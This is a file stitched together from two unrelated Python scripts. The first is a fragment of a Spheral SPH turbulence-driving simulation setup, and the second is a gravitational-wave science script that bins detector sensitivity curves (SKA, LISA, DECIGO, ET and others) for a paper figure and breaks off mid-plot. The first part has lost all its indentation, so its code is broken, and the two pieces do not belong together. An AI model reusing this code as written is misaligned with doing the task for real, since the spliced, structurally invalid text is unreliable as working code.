ky[i,:,k] = n[1]*np.fft.fftfreq(n[1])
for i in range(0,n[0]):
for j in range(0,n[1]):
kz[i,j,:] = n[2]*np.fft.fftfreq(n[2])
kx = np.array(kx, dtype=dtype)
ky = np.array(ky, dtype=dtype)
kz = np.array(kz, dtype=dtype)
k = np.sqrt(np.array(kx**2+ky**2+kz**2, dtype=dtype))
# only use the positive frequencies
inds = np.where(np.logical_and(k**2 >= kmin**2, k**2 < (kmax+1)**2))
nr = len(inds[0])
phasex = np.zeros(n, dtype=dtype)
phasex[inds] = 2.*pi*np.random.uniform(size=nr)
fx = np.zeros(n, dtype=dtype)
fx[inds] = np.random.normal(size=nr)
phasey = np.zeros(n, dtype=dtype)
phasey[inds] = 2.*pi*np.random.uniform(size=nr)
fy = np.zeros(n, dtype=dtype)
fy[inds] = np.random.normal(size=nr)
phasez = np.zeros(n, dtype=dtype)
phasez[inds] = 2.*pi*np.random.uniform(size=nr)
fz = np.zeros(n, dtype=dtype)
fz[inds] = np.random.normal(size=nr)
# rescale perturbation amplitude so that low number statistics
# at low k do not throw off the desired power law scaling.
for i in range(kmin, kmax+1):
slice_inds = np.where(np.logical_and(k >= i, k < i+1))
rescale = sqrt(np.sum(np.abs(fx[slice_inds])**2 + np.abs(fy[slice_inds])**2 + np.abs(fz[slice_inds])**2))
fx[slice_inds] = fx[slice_inds]/rescale
fy[slice_inds] = fy[slice_inds]/rescale
fz[slice_inds] = fz[slice_inds]/rescale
# set the power law behavior
# wave number bins
fx[inds] = fx[inds]*k[inds]**-(0.5*alpha)
fy[inds] = fy[inds]*k[inds]**-(0.5*alpha)
fz[inds] = fz[inds]*k[inds]**-(0.5*alpha)
# add in phases
fx = np.cos(phasex)*fx + 1j*np.sin(phasex)*fx
fy = np.cos(phasey)*fy + 1j*np.sin(phasey)*fy
fz = np.cos(phasez)*fz + 1j*np.sin(phasez)*fz
return fx, fy, fz, kx, ky, kz
def normalize(fx, fy, fz):
    norm = np.sqrt(np.sum(fx**2 + fy**2 + fz**2)/np.prod(n))
fx = fx/norm
fy = fy/norm
fz = fz/norm
return fx, fy, fz
def make_perturbations():
    fx, fy, fz, kx, ky, kz = init_perturbations(dtype)
if f_solenoidal != None:
k2 = kx**2+ky**2+kz**2
# solenoidal part
fxs = 0.; fys =0.; fzs = 0.
if f_solenoidal != 0.0:
fxs = np.real(fx - kx*(kx*fx+ky*fy+kz*fz)/np.maximum(k2,1e-16))
fys = np.real(fy - ky*(kx*fx+ky*fy+kz*fz)/np.maximum(k2,1e-16))
fzs = np.real(fz - kz*(kx*fx+ky*fy+kz*fz)/np.maximum(k2,1e-16))
ind = np.where(k2 == 0)
fxs[ind] = 0.; fys[ind] = 0.; fzs[ind] = 0.
# need to normalize this before applying relative weighting of solenoidal / compressive components
norm = np.sqrt(np.sum(fxs**2+fys**2+fzs**2))
fxs = fxs/norm
fys = fys/norm
fzs = fzs/norm
# compressive part
# get a different random cube for the compressive part
# so that we can target the RMS solenoidal fraction,
# instead of setting a constant solenoidal fraction everywhere.
fx, fy, fz, kx, ky, kz = init_perturbations(dtype)
fxc = 0.; fyc =0.; fzc = 0.
if f_solenoidal != 1.0:
fxc = np.real(kx*(kx*fx+ky*fy+kz*fz)/np.maximum(k2,1e-16))
fyc = np.real(ky*(kx*fx+ky*fy+kz*fz)/np.maximum(k2,1e-16))
fzc = np.real(kz*(kx*fx+ky*fy+kz*fz)/np.maximum(k2,1e-16))
ind = np.where(k2 == 0)
fxc[ind] = 0.; fyc[ind] = 0.; fzc[ind] = 0.
# need to normalize this before applying relative weighting of solenoidal / compressive components
norm = np.sqrt(np.sum(fxc**2+fyc**2+fzc**2))
fxc = fxc/norm
fyc = fyc/norm
fzc = fzc/norm
# back to real space
pertx = np.real(np.fft.ifftn(f_solenoidal*fxs + (1.-f_solenoidal)*fxc))
perty = np.real(np.fft.ifftn(f_solenoidal*fys + (1.-f_solenoidal)*fyc))
pertz = np.real(np.fft.ifftn(f_solenoidal*fzs + (1.-f_solenoidal)*fzc))
else:
# just convert to real space
pertx = np.real(np.fft.ifftn(fx))
perty = np.real(np.fft.ifftn(fy))
pertz = np.real(np.fft.ifftn(fz))
# subtract off COM (assuming uniform density)
pertx = pertx-np.average(pertx)
perty = perty-np.average(perty)
pertz = pertz-np.average(pertz)
# scale RMS of perturbation cube to unity
pertx, perty, pertz = normalize(pertx, perty, pertz)
return pertx, perty, pertz
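# Note on the decomposition above: the "solenoidal part" is the transverse
# Fourier-space projection f - k (k.f) / k^2 and the "compressive part" is the
# complementary longitudinal projection k (k.f) / k^2; the two are mixed with
# weight f_solenoidal before the inverse FFT back to real space.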
#-------------------------------------------------------------------------------
# Periodic work function
#-------------------------------------------------------------------------------
class perturb(object):
def __init__(self,nodeSet,directory):
self.nodeSet = nodeSet
self.directory = directory
def __call__(self, cycle, time, dt):
pertx, perty, pertz = make_perturbations()
#-------------------------------------------------------------------------------
# Check if the necessary output directories exist. If not, create them.
#-------------------------------------------------------------------------------
import os, sys, shutil
if mpi.rank == 0:
if clearDirectories and os.path.exists(dataDir):
shutil.rmtree(dataDir)
if not os.path.exists(restartDir):
os.makedirs(restartDir)
if not os.path.exists(vizDir):
os.makedirs(vizDir)
mpi.barrier()
#-------------------------------------------------------------------------------
# If we're restarting, find the set of most recent restart files.
#-------------------------------------------------------------------------------
if restoreCycle is None:
restoreCycle = findLastRestart(restartBaseName)
#-------------------------------------------------------------------------------
# Material properties.
#-------------------------------------------------------------------------------
eos = GammaLawGasMKS(gamma, mu)
#-------------------------------------------------------------------------------
# Interpolation kernels.
#-------------------------------------------------------------------------------
WT = TableKernel(BSplineKernel(), 1000)
output("WT")
kernelExtent = WT.kernelExtent
#-------------------------------------------------------------------------------
# Make the NodeList.
#-------------------------------------------------------------------------------
nodes1 = makeFluidNodeList("High density gas", eos,
hmin = hmin,
hmax = hmax,
hminratio = hminratio,
nPerh = nPerh,
kernelExtent = kernelExtent)
output("nodes1.nodesPerSmoothingScale")
output("nodes1.hmin")
output("nodes1.hmax")
output("nodes1.hminratio")
#-------------------------------------------------------------------------------
# Set the node properties.
#-------------------------------------------------------------------------------
if restoreCycle is None:
generator1 = GenerateNodeDistribution3d(nx, ny, nz, rho1, seed,
xmin = xmin,
xmax = xmax,
nNodePerh = nPerh)
if mpi.procs > 1:
from VoronoiDistributeNodes import distributeNodes3d
else:
from DistributeNodes import distributeNodes3d
distributeNodes3d((nodes1, generator1))
output("mpi.reduce(nodes1.numInternalNodes, mpi.MIN)")
output("mpi.reduce(nodes1.numInternalNodes, mpi.MAX)")
output("mpi.reduce(nodes1.numInternalNodes, mpi.SUM)")
# Set node specific thermal energies
nodes1.specificThermalEnergy(ScalarField("tmp", nodes1, eps1))
#-------------------------------------------------------------------------------
# Construct a DataBase to hold our node list
#-------------------------------------------------------------------------------
db = DataBase3d()
output("db")
db.appendNodeList(nodes1)
output("db.numNodeLists")
output("db.numFluidNodeLists")
#-------------------------------------------------------------------------------
# Construct the artificial viscosity.
#-------------------------------------------------------------------------------
q = Qconstructor(Cl, Cq, linearInExpansion)
q.epsilon2 = epsilon2
q.limiter = Qlimiter
q.balsaraShearCorrection = balsaraCorrection
output("q")
output("q.Cl")
output("q.Cq")
output("q.epsilon2")
output("q.limiter")
output("q.balsaraShearCorrection")
output("q.linearInExpansion")
output("q.quadraticInExpansion")
#-------------------------------------------------------------------------------
# Construct the hydro physics object.
#-------------------------------------------------------------------------------
if SVPH:
hydro = HydroConstructor(W = WT,
Q = q,
cfl = cfl,
useVelocityMagnitudeForDt = useVelocityMagnitudeForDt,
compatibleEnergyEvolution = compatibleEnergy,
densityUpdate = densityUpdate,
XSVPH = XSPH,
linearConsistent = linearConsistent,
generateVoid = False,
HUpdate = HUpdate,
fcentroidal = fcentroidal,
fcellPressure = fcellPressure,
xmin = Vector(-2.0, -2.0, -2.0),
xmax = Vector(3.0, 3.0, 3.0))
# xmin = Vector(x0 - 0.5*(x2 - x0), y0 - 0.5*(y2 - y0)),
# xmax = Vector(x2 + 0.5*(x2 - x0), y2 + 0.5*(y2 - y0)))
elif CRKSPH:
hydro = HydroConstructor(W = WT,
Q = q,
filter = filter,
cfl = cfl,
useVelocityMagnitudeForDt = useVelocityMagnitudeForDt,
compatibleEnergyEvolution = compatibleEnergy,
XSPH = XSPH,
densityUpdate = densityUpdate,
HUpdate = HUpdate)
else:
hydro = HydroConstructor(W = WT,
Q = q,
cfl = cfl,
useVelocityMagnitudeForDt = useVelocityMagnitudeForDt,
compatibleEnergyEvolution = compatibleEnergy,
gradhCorrection = gradhCorrection,
XSPH = XSPH,
densityUpdate = densityUpdate,
HUpdate = HUpdate,
epsTensile = epsilonTensile,
nTensile = nTensile)
output("hydro")
output("hydro.kernel()")
output("hydro.PiKernel()")
output("hydro.cfl")
output("hydro.compatibleEnergyEvolution")
output("hydro.densityUpdate")
output("hydro.HEvolution")
packages = [hydro]
#-------------------------------------------------------------------------------
# Create boundary conditions.
#-------------------------------------------------------------------------------
xPlane0 = Plane(Vector(*xmin), Vector(1.0, 0.0, 0.0))
xPlane1 = Plane(Vector(*xmax), Vector(-1.0,0.0, 0.0))
yPlane0 = Plane(Vector(*xmin), Vector(0.0, 1.0, 0.0))
yPlane1 = Plane(Vector(*xmax), Vector(0.0, -1.0, 0.0))
zPlane0 = Plane(Vector(*xmin), Vector(0.0, 0.0, 1.0))
zPlane1 = Plane(Vector(*xmax), Vector(0.0, 0.0, -1.0))
xbc = PeriodicBoundary(xPlane0, xPlane1)
ybc = PeriodicBoundary(yPlane0, yPlane1)
zbc = PeriodicBoundary(zPlane0, zPlane1)
for p in packages:
p.appendBoundary(xbc)
p.appendBoundary(ybc)
p.appendBoundary(zbc)
#-------------------------------------------------------------------------------
# Construct a time integrator, and add the physics packages.
#-------------------------------------------------------------------------------
integrator = IntegratorConstructor(db)
for p in packages:
integrator.appendPhysicsPackage(p)
integrator.lastDt = dt
integrator.dtMin = dtMin
integrator.dtMax = dtMax
integrator.dtGrowth = dtGrowth
integrator.domainDecompositionIndependent = domainIndependent
integrator.verbose = dtverbose
integrator.rigorousBoundaries = rigorousBoundaries
output("integrator")
output("integrator.havePhysicsPackage(hydro)")
output("integrator.lastDt")
output("integrator.dtMin")
output("integrator.dtMax")
output("integrator.dtGrowth")
output("integrator.domainDecompositionIndependent")
output("integrator.rigorousBoundaries")
output("integrator.verbose")
#-------------------------------------------------------------------------------
# Make the problem controller.
#-------------------------------------------------------------------------------
if useVoronoiOutput:
import SpheralVoronoiSiloDump
vizMethod = SpheralVoronoiSiloDump.dumpPhysicsState
else:
import SpheralPointmeshSiloDump
vizMethod = SpheralPointmeshSiloDump.dumpPhysicsState
control = SpheralController(integrator, WT,
initializeDerivatives = True,
statsStep = statsStep,
restartStep = restartStep,
restartBaseName = restartBaseName,
restoreCycle = restoreCycle,
redistributeStep = redistributeStep,
vizMethod = vizMethod,
vizBaseName = vizBaseName,
vizDir = vizDir,
vizStep = vizCycle,
vizTime = vizTime,
SPH = SPH)
pert = perturb([nodes1], dataDir)
control.appendPeriodicWork(pert, perturbEach)
output("control")
#-------------------------------------------------------------------------------
# Advance to the end time.
#-------------------------------------------------------------------------------
control.advance(goalTime)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 10 17:31:56 2020
@author: Paolo Campeti
This script reproduces Figure 8 in the paper.
Uses methods imported from module sgwbprobecomb/SGWB_Signal.py and
sgwbprobecomb/Binned_errors.py.
"""
import os.path as op
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import seaborn as sns
# import our classes and methods
from sgwbprobe.SGWB_Signal import Signal_GW
from sgwbprobe.Binned_errors import Binned_GW
#seaborn settings
sns.set()
sns.set(style='whitegrid')
#matplotlib settings
mpl.rcParams['figure.dpi'] = 300
mpl.rcParams['figure.figsize'] = [5,3]
mpl.rcParams['text.usetex'] = True
mpl.rc('font',**{'family':'serif','serif':['Times New Roman'],'size':14})
axissize = 6
labelsize = 8
legendsize = 10
colornorm = colors.Normalize(vmin=0.0, vmax=5.0)
linesize = 2
# Useful constant: seconds in a year
year_sec = 60*60*24*365
# Load and unpack PTA and Interferometers instrumental strains
# SKA
SKA_file = np.load(op.join(op.dirname(__file__), 'files/hc_SKA.npz'))
SKA_freq = SKA_file['x']
SKA_hc = SKA_file['y']
SKA_strain = SKA_hc**2/SKA_freq
eff_SKA = 1. # mission efficiency factor
SKA_T_obs = 10 * year_sec * eff_SKA
# Einstein Telescope
ET = np.load(op.join(op.dirname(__file__),'files/S_h_ET.npz'))
ET_freq = ET['x']
ET_strain = ET['y']
eff_ET = 1. # mission efficiency factor
ET_T_obs = 1 * year_sec * eff_ET
# Advanced LIGO
aLIGO = np.load(op.join(op.dirname(__file__),'files/S_h_aLIGO.npz'))
aLIGO_freq = aLIGO['x']
aLIGO_strain = aLIGO['y']
eff_aLIGO = 1. # mission efficiency factor
aLIGO_T_obs = 4 * year_sec * eff_aLIGO
# LISA
LISA_xcosmo = np.load(op.join(op.dirname(__file__),'files/S_h_LISA_xcosmo.npz'))
LISA_xcosmo_freq = LISA_xcosmo['x']
LISA_xcosmo_strain = LISA_xcosmo['y']
eff_LISA = 0.75
LISA_xcosmo_T_obs = 4 * year_sec * eff_LISA
# muAres without fgs
Ares_nofgs = np.load(op.join(op.dirname(__file__),'files/S_h_muAres_nofgs.npz'))
Ares_nofgs_freq = Ares_nofgs['x']
Ares_nofgs_strain = Ares_nofgs['y']
eff_Ares = 1.
Ares_nofgs_T_obs = 10 * year_sec * eff_Ares
# BBO STAR
BBO_STAR = np.load(op.join(op.dirname(__file__),'files/S_h_BBO_STAR.npz'))
BBO_STAR_freq = BBO_STAR['x']
BBO_STAR_strain = BBO_STAR['y']
eff_BBO = 1.
BBO_STAR_T_obs = 10 * year_sec * eff_BBO
# DECIGO
DECIGO = np.load(op.join(op.dirname(__file__),'files/S_h_DECIGO.npz'))
DECIGO_freq = DECIGO['x']
DECIGO_strain = DECIGO['y']
eff_DECIGO = 1.
DECIGO_T_obs = 10 * year_sec * eff_DECIGO
# DO Optimal
DO = np.load(op.join(op.dirname(__file__),'files/S_h_DO_Optimal.npz'))
DO_freq = DO['x']
DO_strain = DO['y']
eff_DO = 0.75
DO_T_obs = 4 * year_sec * eff_DO
# DO Conservative
DO_cons = np.load(op.join(op.dirname(__file__),'files/S_h_DO_Conservative.npz'))
DO_cons_freq = DO_cons['x']
DO_cons_strain = DO_cons['y']
eff_DO = 0.75
DO_cons_T_obs = 4 * year_sec * eff_DO
# AEDGE
AEDGE = np.load(op.join(op.dirname(__file__),'files/S_h_AEDGE.npz'))
AEDGE_freq = AEDGE['x']
AEDGE_strain = AEDGE['y']
eff_AEDGE = 0.6
AEDGE_T_obs = 5 * year_sec * eff_AEDGE
###############################################################################
# Generate primordial signals and wavenumber vector
class_axion1 = Signal_GW(r_vac=1e-5, r_star=835, k_p=1e13, sigma=9, axion=True)
class_axion2 = Signal_GW(r_vac=1e-5, r_star=0.15 , k_p=1e11, sigma=8, axion=True)
class_no_axion = Signal_GW(r_vac=0.01, axion=None)
class_no_axion_r0001 = Signal_GW(r_vac=0.001, axion=None)
# Wavenumber array
k = np.logspace(np.log10(1e-5), np.log10(1e20), 100000)
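# Hedged note: the constant 6.5e14 used repeatedly below appears to convert a GW
# frequency in Hz into a comoving wavenumber in Mpc^-1 (k [Mpc^-1] ~ 6.5e14 * f [Hz]);
# the plotting and saving code later divides by the same factor to get back to frequency:
#   k_SKA = np.array(SKA_freq) * 6.5e14        # Hz -> Mpc^-1
#   freq  = np.array(bins_mean_point) / 6.5e14 # Mpc^-1 -> Hz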
###############################################################################
#class for SKA
sens_curve_SKA = np.array(SKA_strain)
omega_gw = class_axion1.analytic_omega_WK(k)
k_SKA = np.array(SKA_freq) * 6.5e14
class_binned_SKA = Binned_GW(
name_exp='SKA',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_SKA,
omega_gw=omega_gw,
k_sens=k_SKA,
kmin_sens=k_SKA[0],
N_bins_sens=5,
T_obs=SKA_T_obs,
n_det=1.,
sigma_L=1.0,
)
xerr_SKA, yerr_SKA, bins_mean_point_SKA, binned_signal_SKA, binned_curve_SKA = class_binned_SKA.sens_curve_binning()
###############################################################################
#class for AEDGE
sens_curve_AEDGE = np.array(AEDGE_strain)
omega_gw = class_axion1.analytic_omega_WK(k)
k_AEDGE = np.array(AEDGE_freq) * 6.5e14
class_binned_AEDGE = Binned_GW(name_exp='AEDGE',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_AEDGE,
omega_gw=omega_gw,
k_sens=k_AEDGE,
kmin_sens=k_AEDGE[0],
N_bins_sens=4,
T_obs=AEDGE_T_obs,
n_det = 1.,
interp=True,
sigma_L=1.0,
)
xerr_AEDGE, yerr_AEDGE, bins_mean_point_AEDGE, binned_signal_AEDGE, binned_curve_AEDGE = class_binned_AEDGE.sens_curve_binning()
###############################################################################
#class for ET
sens_curve_ET = np.array(ET_strain)
omega_gw = class_axion1.analytic_omega_WK(k)
k_ET = np.array(ET_freq) * 6.5e14
class_binned_ET = Binned_GW(name_exp='ET',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_ET,
omega_gw=omega_gw,
k_sens=k_ET,
kmin_sens=1.5*6.5e14 ,
N_bins_sens=5,
T_obs=ET_T_obs,
interp=True,
n_det = 3.,
sigma_L=1.0,
)
xerr_ET, yerr_ET, bins_mean_point_ET, binned_signal_ET, binned_curve_ET = class_binned_ET.sens_curve_binning()
###############################################################################
#class for aLIGO
sens_curve_aLIGO = np.array(aLIGO_strain)
omega_gw = class_axion1.analytic_omega_WK(k)
k_aLIGO = np.array(aLIGO_freq) * 6.5e14
class_binned_aLIGO = Binned_GW(name_exp='Adv_LIGO',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_aLIGO,
omega_gw=omega_gw,
k_sens=k_aLIGO,
kmin_sens=k_aLIGO[0],
N_bins_sens=5,
T_obs=aLIGO_T_obs,
n_det = 1.,
sigma_L=1.,
)
xerr_aLIGO, yerr_aLIGO, bins_mean_point_aLIGO, binned_signal_aLIGO, binned_curve_aLIGO = class_binned_aLIGO.sens_curve_binning()
###############################################################################
#class for LISA
sens_curve_LISA = np.array(LISA_xcosmo_strain)
omega_gw = class_axion1.analytic_omega_WK(k)
k_LISA = np.array(LISA_xcosmo_freq) * 6.5e14
class_binned = Binned_GW(name_exp='LISA',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_LISA,
omega_gw=omega_gw,
k_sens=k_LISA,
kmin_sens=1.21303790e+10,
N_bins_sens=8,
T_obs=LISA_xcosmo_T_obs,
n_det = 1.,
interp=True,
sigma_L=1.0,
)
binned_signal_whole, bins_mean_point_whole = class_binned.Omega_GW_binning()
xerr, yerr, bins_mean_point, binned_signal, binned_curve = class_binned.sens_curve_binning()
################################################################################
# BBO
omega_gw_axion2 = class_axion2.analytic_omega_WK(k)
k_BBO = np.array(BBO_STAR_freq) * 6.5e14
sens_curve_BBO = np.array(BBO_STAR_strain)
class_BBO = Binned_GW(name_exp='BBO',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_BBO,
omega_gw=omega_gw_axion2,
k_sens=k_BBO,
kmin_sens=k_BBO[0],
N_bins_sens=12,
T_obs=BBO_STAR_T_obs,
n_det = 2.,
interp=True,
sigma_L=1.0,
)
binned_signal_axion2, bins_mean_point_axion2 = class_BBO.Omega_GW_binning()
xerr_BBO, yerr_BBO, bins_mean_point_BBO, binned_signal_BBO, binned_curve_BBO = class_BBO.sens_curve_binning()
###############################################################################
#class for LiteBIRD and r=0
Fisher = np.load(op.join(op.dirname(__file__),'files/LiteBIRD_Fisher_matrices/Fisher_1.3_r0.npy'))
omega_gw_flat_r0001 = class_no_axion_r0001.analytic_omega_WK(k)
power_spectrum_r0001 = class_no_axion_r0001.tensor_spect(k)
class_binned_flat_CMB_0001 = Binned_GW(name_exp='LiteBIRD',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
omega_gw=omega_gw_flat_r0001,
kmin_sens=1e-4,
N_bins_sens=7,
CMB=True,
F=Fisher,
tensor_spect=power_spectrum_r0001,
sigma_L=1.0,
)
xerr_flat_0001, yerr_flat_0001, bins_mean_point_flat_0001, binned_signal_flat_0001, binned_curve_flat_0001 = class_binned_flat_CMB_0001.sens_curve_binning()
################################################################################
#class for DECIGO
sens_curve_DECIGO = np.array(DECIGO_strain)
k_decigo = class_axion1.freq_k_conv(DECIGO_freq)
class_DECIGO = Binned_GW(name_exp='DECIGO',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_DECIGO,
omega_gw=omega_gw_axion2,
k_sens=k_decigo,
kmin_sens=k_decigo[0],
N_bins_sens=11,
T_obs = DECIGO_T_obs,
interp=True,
n_det = 2.,
sigma_L=1.0,
)
xerr_decigo, yerr_decigo, bins_mean_point_decigo, binned_signal_decigo, binned_curve_decigo = class_DECIGO.sens_curve_binning()
################################################################################
#class for muAres without foregrounds
sens_curve_MUARES_nofgs = np.array(Ares_nofgs_strain)
k_muares_nofgs = class_axion1.freq_k_conv(Ares_nofgs_freq)
class_MUARES_nofgs = Binned_GW(name_exp='muAres',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_MUARES_nofgs,
omega_gw=omega_gw,
k_sens=k_muares_nofgs,
kmin_sens=k_muares_nofgs[0],
N_bins_sens=12,
T_obs=Ares_nofgs_T_obs,
interp=True,
n_det = 2.,
sigma_L=1.0,
)
xerr_muares_nofgs, yerr_muares_nofgs, bins_mean_point_muares_nofgs, binned_signal_muares_nofgs, binned_curve_muares_nofgs = class_MUARES_nofgs.sens_curve_binning()
###############################################################################
#class for DO Optimal
sens_curve_DO = np.array(DO_strain)
k_DO = class_axion1.freq_k_conv(DO_freq)
class_DO = Binned_GW(name_exp='DO_Opt',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_DO,
omega_gw=omega_gw,
k_sens=k_DO,
kmin_sens=k_DO[0],
N_bins_sens=7,
T_obs=DO_T_obs,
interp=True,
n_det = 1.,
sigma_L=1.0,
)
xerr_DO, yerr_DO, bins_mean_point_DO, binned_signal_DO, binned_curve_DO = class_DO.sens_curve_binning()
###############################################################################
#class for DO Conservative
sens_curve_DO_cons = np.array(DO_cons_strain)
k_DO_cons = class_axion1.freq_k_conv(DO_cons_freq)
class_DO_cons = Binned_GW(name_exp='DO_Cons',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_DO_cons,
omega_gw=omega_gw,
k_sens=k_DO_cons,
kmin_sens=k_DO_cons[0],
N_bins_sens=7,
T_obs=DO_cons_T_obs,
interp=True,
n_det = 1.,
sigma_L=1.0,
)
xerr_DO_cons, yerr_DO_cons, bins_mean_point_DO_cons, binned_signal_DO_cons, binned_curve_DO_cons = class_DO_cons.sens_curve_binning()
###############################################################################
###############################################################################
########## FOREGROUNDS BELOW!! ###########
###############################################################################
###############################################################################
#class for SKA for fgs
class_binned_SKA_fgs = Binned_GW(name_exp='SKA_with_fgs',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_SKA,
omega_gw=omega_gw,
k_sens=k_SKA,
kmin_sens=k_SKA[0],
N_bins_sens=5,
T_obs=SKA_T_obs,
n_det=1.,
fgs=True,
sigma_L=1.0,
)
xerr_SKA_fgs, yerr_SKA_fgs, bins_mean_point_SKA_fgs, binned_signal_SKA_fgs, binned_curve_SKA_fgs = class_binned_SKA_fgs.sens_curve_binning()
###############################################################################
# Class for ET with fgs
class_binned_ET_fgs = Binned_GW(name_exp='ET_with_fgs',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_ET,
omega_gw=omega_gw,
k_sens=k_ET,
kmin_sens=1.5*6.5e14 ,
N_bins_sens=5,
T_obs=ET_T_obs,
n_det = 3.,
fgs=True,
interp=True,
sigma_L=1.0,
)
xerr_ET_fgs, yerr_ET_fgs, bins_mean_point_ET_fgs, binned_signal_ET_fgs, binned_curve_ET_fgs = class_binned_ET_fgs.sens_curve_binning()
###############################################################################
#class for AEDGE with fgs
class_binned_AEDGE_fgs = Binned_GW(name_exp='AEDGE_with_fgs',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_AEDGE,
omega_gw=omega_gw,
k_sens=k_AEDGE,
kmin_sens=k_AEDGE[0],
N_bins_sens=4,
T_obs=AEDGE_T_obs,
n_det = 1.,
interp=True,
fgs=True,
sigma_L=0.1,
)
xerr_AEDGE_fgs, yerr_AEDGE_fgs, bins_mean_point_AEDGE_fgs, binned_signal_AEDGE_fgs, binned_curve_AEDGE_fgs = class_binned_AEDGE_fgs.sens_curve_binning()
###############################################################################
#class for LISA with fgs
class_binned_fgs = Binned_GW(name_exp='LISA_with_fgs',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_LISA,
omega_gw=omega_gw,
k_sens=k_LISA,
kmin_sens=1.21303790e+10,
N_bins_sens=8,
T_obs=LISA_xcosmo_T_obs,
n_det = 1.,
interp=True,
fgs=True,
sigma_L=0.1,
)
xerr_fgs, yerr_fgs, bins_mean_point_fgs, binned_signal_fgs, binned_curve_fgs = class_binned_fgs.sens_curve_binning()
################################################################################
#class for DECIGO with fgs
class_DECIGO_fgs = Binned_GW(name_exp='DECIGO_with_fgs',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_DECIGO,
omega_gw=omega_gw_axion2,
k_sens=k_decigo,
kmin_sens=k_decigo[0],
N_bins_sens=11,
T_obs = DECIGO_T_obs,
interp=True,
n_det = 2.,
fgs=True,
sigma_L=1e-3,
)
xerr_decigo_fgs, yerr_decigo_fgs, bins_mean_point_decigo_fgs, binned_signal_decigo_fgs, binned_curve_decigo_fgs = class_DECIGO_fgs.sens_curve_binning()
##############################################################################
#class for DECIGO only spectral shape
class_DECIGO_spectral = Binned_GW(name_exp='DECIGO_spectral_shape',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_DECIGO,
omega_gw=omega_gw_axion2,
k_sens=k_decigo,
kmin_sens=k_decigo[0],
N_bins_sens=11,
T_obs = DECIGO_T_obs,
interp=True,
n_det = 2.,
fgs=True,
sigma_L=1.0,
)
xerr_decigo_spectral, yerr_decigo_spectral, bins_mean_point_decigo_spectral, binned_signal_decigo_spectral, binned_curve_decigo_spectral = class_DECIGO_spectral.sens_curve_binning()
###############################################################################
#class for DO Optimal with fgs
class_DO_fgs = Binned_GW(name_exp='DO_Optimal_with_fgs',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_DO,
omega_gw=omega_gw,
k_sens=k_DO,
kmin_sens=k_DO[0],
N_bins_sens=7,
T_obs=DO_T_obs,
interp=True,
n_det = 1.,
fgs=True,
sigma_L=0.1,
)
xerr_DO_fgs, yerr_DO_fgs, bins_mean_point_DO_fgs, binned_signal_DO_fgs, binned_curve_DO_fgs = class_DO_fgs.sens_curve_binning()
###############################################################################
#class for DO Conservative with fgs
class_DO_cons_fgs = Binned_GW(name_exp='DO_Cons_withfgs',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_DO_cons,
omega_gw=omega_gw,
k_sens=k_DO_cons,
kmin_sens=k_DO_cons[0],
N_bins_sens=7,
T_obs=DO_cons_T_obs,
interp=True,
n_det = 1.,
fgs=True,
sigma_L=0.1,
)
xerr_DO_cons_fgs, yerr_DO_cons_fgs, bins_mean_point_DO_cons_fgs, binned_signal_DO_cons_fgs, binned_curve_DO_cons_fgs = class_DO_cons_fgs.sens_curve_binning()
###############################################################################
# class for muAres with foregrounds
class_MUARES = Binned_GW(name_exp='muAres_two_fgs_spectral',
kmin=1e-4,
k=k,
N_bins=80,
delta_log_k=1.3,
sens_curve=sens_curve_MUARES_nofgs,
omega_gw=omega_gw,
k_sens=k_muares_nofgs,
kmin_sens=k_muares_nofgs[0],
N_bins_sens=12,
T_obs=Ares_nofgs_T_obs,
interp=True,
n_det = 2.,
sigma_L=1e-3,
fgs=True,
)
xerr_muares, yerr_muares, bins_mean_point_muares, binned_signal_muares, binned_curve_muares = class_MUARES.sens_curve_binning()
###############################################################################
# Plot
fig = plt.figure()
ax = plt.gca()
ax.loglog(np.array(bins_mean_point_BBO)/6.5e14, binned_curve_BBO[:len(bins_mean_point_BBO)], linewidth='1.5', color=sns.xkcd_rgb["dusty purple"], linestyle='--')
ax.loglog(np.array(bins_mean_point_decigo)/6.5e14, binned_curve_decigo[:len(bins_mean_point_decigo)], linewidth='1.5', color=sns.xkcd_rgb["amber"], linestyle='--')
ax.loglog(np.array(bins_mean_point_aLIGO)/6.5e14, binned_curve_aLIGO[:len(bins_mean_point_aLIGO)], label='aLIGO', linewidth='1.5', color=sns.xkcd_rgb["yellow"], linestyle='--')
ax.loglog(np.array(bins_mean_point_DO)/6.5e14, binned_curve_DO[:len(bins_mean_point_DO)], linewidth='1.5', color=sns.xkcd_rgb["greyish"], linestyle='--')
ax.loglog(np.array(bins_mean_point_DO_cons)/6.5e14, binned_curve_DO_cons[:len(bins_mean_point_DO_cons)], linewidth='1.5', color=sns.xkcd_rgb["faded green"], linestyle='--')
